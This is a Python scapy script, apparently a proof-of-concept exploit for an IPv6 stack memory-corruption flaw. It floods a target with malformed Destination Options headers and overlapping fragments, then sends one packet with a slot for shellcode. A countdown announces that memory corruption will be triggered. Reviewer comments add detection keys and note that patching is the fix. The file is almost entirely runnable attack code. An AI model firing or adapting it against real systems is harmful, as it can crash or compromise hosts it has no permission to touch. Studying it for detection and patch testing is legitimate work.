from scapy.all import *
import time
# --- Operator-supplied settings (all empty as published) ---
iface = ''  # interface name handed to scapy's send()/sendp()
ip_addr = ''  # IPv6 destination placed in every crafted packet
mac_addr = ''  # destination MAC; when non-empty, Ethernet frames are built and sent at layer 2
shcd = "example"  # carried as option data in the final packet (placeholder string here)

# --- Traffic shape ---
# Each (batch, try) pair emits two copies of a three-packet group, so the
# burst is num_batches * num_tries * 6 packets plus one trailing packet.
num_tries = num_batches = 20
# Fragment IDs run from this base to base + num_tries - 1 and repeat in every
# batch; a fixed, narrow ID range like this is a usable network-detection key.
fragment_id_start = 0xdebac1e
def get_packets_with_mac(i):
    """Build the three-packet group for index *i* as Ethernet frames.

    Every frame is addressed to ``mac_addr``/``ip_addr`` with flow label 1 and
    hop limit ``64 + i``:

    1. a Destination Options header whose single option has type 0x81 and
       three bytes of data;
    2. a fragment (ID ``fragment_id_start + i``, offset 0, more-fragments set)
       carrying eight bytes;
    3. a fragment with the same ID, offset 1, more-fragments clear, no data.

    Returns the three packets as a list, in that order.
    """
    ident = fragment_id_start + i

    def base():
        # Fresh L2/L3 headers for each packet in the group.
        return Ether(dst=mac_addr) / IPv6(fl=1, hlim=64 + i, dst=ip_addr)

    # 0x81 is not a defined pad option: under RFC 8200 the top two bits (10)
    # tell a receiver that does not recognise the type to drop the packet and
    # answer with an ICMPv6 Parameter Problem. Unknown option types inside
    # Destination Options are therefore a reasonable thing to alert on.
    dest_opt = base() / IPv6ExtHdrDestOpt(
        options=[PadN(otype=0x81, optdata='a' * 3)]
    )
    opening_frag = base() / IPv6ExtHdrFragment(id=ident, m=1, offset=0) / 'aaaaaaaa'
    closing_frag = base() / IPv6ExtHdrFragment(id=ident, m=0, offset=1)
    return [dest_opt, opening_frag, closing_frag]
def get_packets(i):
    """Return the three-packet group for index *i*.

    When ``mac_addr`` is non-empty the work is handed to
    ``get_packets_with_mac``. Otherwise the same three packets are built
    starting at the IPv6 header (no Ethernet layer): a Destination Options
    header with one option of type 0x81, then two fragments sharing the ID
    ``fragment_id_start + i`` (offset 0 with eight data bytes and
    more-fragments set, then offset 1 with more-fragments clear).
    """
    if mac_addr:
        return get_packets_with_mac(i)

    ident = fragment_id_start + i
    hop_limit = 64 + i

    def ip6():
        # Hop limit varies with i; flow label and destination are constant.
        return IPv6(fl=1, hlim=hop_limit, dst=ip_addr)

    return [
        # Option type 0x81 falls in RFC 8200's "discard and report" class
        # for receivers that do not recognise it.
        ip6() / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a' * 3)]),
        ip6() / IPv6ExtHdrFragment(id=ident, m=1, offset=0) / 'aaaaaaaa',
        ip6() / IPv6ExtHdrFragment(id=ident, m=0, offset=1),
    ]
def create_payload():
    """Build the single trailing packet that carries ``shcd``.

    The packet is an Ethernet frame to ``mac_addr`` holding an IPv6 header
    (flow label 1, hop limit 64) and a Destination Options header whose one
    option has type 0x81 and ``shcd`` as its data. Unlike ``get_packets``,
    the Ethernet header is added whether or not ``mac_addr`` is set.

    NOTE(review): nothing in this file shows the option data being executed
    on the receiver; as written the bytes are only transported.
    """
    carrier_option = PadN(otype=0x81, optdata=shcd)
    return (
        Ether(dst=mac_addr)
        / IPv6(fl=1, hlim=64, dst=ip_addr)
        / IPv6ExtHdrDestOpt(options=[carrier_option])
    )
# NOTE(review): indentation was lost on this page; the nesting below is the
# reading the statements imply — confirm against the original file.
final_ps = []
# Generate and collect packets: two copies of each three-packet group per
# (batch, try) pair, so the same fragment IDs recur within and across batches.
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)
# Add payload packets
# The shcd-carrying packet is appended once, after the whole burst.
payload_packet = create_payload()
final_ps.append(payload_packet)
print("Sending packets")
# Layer-2 send when a MAC was configured, layer-3 send otherwise. All traffic
# is IPv6, so an interface with IPv6 disabled or filtered never processes it;
# the durable fix is the vendor patch for the targeted CVE (its number is not
# stated on this page).
if mac_addr:
    sendp(final_ps, iface)
else:
    send(final_ps, iface)
# Wait 1 minute to trigger the vulnerability
# NOTE(review): 60 s is also the fragment reassembly timeout in RFC 8200, so
# the delay presumably waits for receiver-side fragment state to expire —
# confirm. For incident timelines, any effect on the receiver would lag the
# burst by about a minute. The loop itself only prints a countdown and sleeps.
for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")